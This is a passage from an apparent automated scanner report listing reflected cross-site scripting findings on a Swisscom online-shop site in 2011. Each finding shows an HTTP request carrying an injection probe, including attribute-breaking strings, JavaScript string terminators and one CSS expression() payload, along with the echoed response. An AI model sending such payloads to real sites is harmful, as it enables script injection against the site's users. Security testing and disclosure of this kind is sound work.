Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d55"%20a%3db%20c68dd629a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36d55" a=b c68dd629a01 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&36d55"%20a%3db%20c68dd629a01=1 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:24 GMT
Set-Cookie: JSESSIONID=2382706D4BE1CDA8139E1C653A9F5CEF; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 78925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&36d55" a=b c68dd629a01=1&lang=de&plang=de">
...[SNIP]...

6.244. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e144"%20a%3db%2072036746c19 was submitted in the nsextt parameter. This input was echoed as 3e144" a=b 72036746c19 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))3e144"%20a%3db%2072036746c19 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CP=null*; CTQ=second; s_cc=true; s_nr=1303671140692-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/productdetail%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/contact.aspx%25253Flang%25253Dit%252526plang%25253Dit%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:15:39 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 83140


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&nsextt=" stYle="x:expre/**/ssion(netsparker(9))3e144" a=b 72036746c19&lang=de&plang=de">
...[SNIP]...

6.245. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [subcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The value of the subcat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fa08"%3bcf64dc6a770 was submitted in the subcat parameter. This input was echoed as 6fa08";cf64dc6a770 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone6fa08"%3bcf64dc6a770&drilldown=3&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:40 GMT
Set-Cookie: JSESSIONID=6BB69376881C8AC96CA51DCEC5015CE0; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 57205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="pages/category/category.aspx"
s.server="SW1297P"
s.channel="os_festnetz:os_telefone6fa08";cf64dc6a770"
s.pageType=""
s.prop1="OS_Festnetz"
s.prop2="OS_Festnetz:OS_Telefone6fa08";cf64dc6a770"
s.prop3="OS_Festnetz:OS_Telefone6fa08";cf64dc6a770"
s.prop4=""
s.prop5=""
s.
...[SNIP]...

6.246. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [subcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The value of the subcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe66"%20a%3db%202faba8dca65 was submitted in the subcat parameter. This input was echoed as cfe66" a=b 2faba8dca65 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefonecfe66"%20a%3db%202faba8dca65&drilldown=3&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:17 GMT
Set-Cookie: JSESSIONID=84722ED00415689E084E2FE7A53A998E; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 57342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefonecfe66" a=b 2faba8dca65&drilldown=3&lang=de&plang=de">
...[SNIP]...

6.247. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efa1"%20a%3db%20ce03204135 was submitted in the cat parameter. This input was echoed as 8efa1" a=b ce03204135 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz8efa1"%20a%3db%20ce03204135&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:24:44 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 63136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz8efa1" a=b ce03204135&subcat=OS_Telefone&drilldown=7&nsextt=&id=1000299810&lang=de&plang=de">
...[SNIP]...

6.248. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bee30"%3bb9ba0f2d807 was submitted in the cat parameter. This input was echoed as bee30";b9ba0f2d807 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetzbee30"%3bb9ba0f2d807&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:24:58 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 63068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="pages/productconfig/productconfig.aspx"
s.server="SW1297P"
s.channel="os_festnetzbee30";b9ba0f2d807:os_telefone"
s.pageType=""
s.prop1="OS_Festnetzbee30";b9ba0f2d807"
s.prop2="OS_Festnetzbee30";b9ba0f2d807:OS_Telefone"
s.prop3="OS_Festnetzbee30";b9ba0f2d807:OS_Telefone"
s.pr
...[SNIP]...

6.249. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [drilldown parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the drilldown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174e0"%20a%3db%209a473be25ea was submitted in the drilldown parameter. This input was echoed as 174e0" a=b 9a473be25ea in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7174e0"%20a%3db%209a473be25ea&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:26:31 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 73926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7174e0" a=b 9a473be25ea&nsextt=&id=1000299810&lang=de&plang=de">
...[SNIP]...

6.250. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e095"%20a%3db%20edae2171eed was submitted in the id parameter. This input was echoed as 7e095" a=b edae2171eed in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=10002998107e095"%20a%3db%20edae2171eed HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:28:38 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 48886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Swisscom O
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/CustomError/CustomError.aspx?ErrorMessageId=Error.Product.NotFound&ErrorMessageParam=10002998107e095" a=b edae2171eed&lang=de&plang=de">
...[SNIP]...

6.251. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02c6"%20a%3db%20f07af7a4344 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f02c6" a=b f07af7a4344 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810&f02c6"%20a%3db%20f07af7a4344=1 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:31:41 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 74139


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&nsextt=&id=1000299810&f02c6" a=b f07af7a4344=1&lang=de&plang=de">
...[SNIP]...

6.252. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bc3"%20a%3db%20c044c6f944b was submitted in the nsextt parameter. This input was echoed as 44bc3" a=b c044c6f944b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=44bc3"%20a%3db%20c044c6f944b&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:27:45 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 73926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&nsextt=44bc3" a=b c044c6f944b&id=1000299810&lang=de&plang=de">
...[SNIP]...

6.253. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [subcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the subcat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d8ff"%3bec76a0eadf7 was submitted in the subcat parameter. This input was echoed as 1d8ff";ec76a0eadf7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone1d8ff"%3bec76a0eadf7&drilldown=7&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
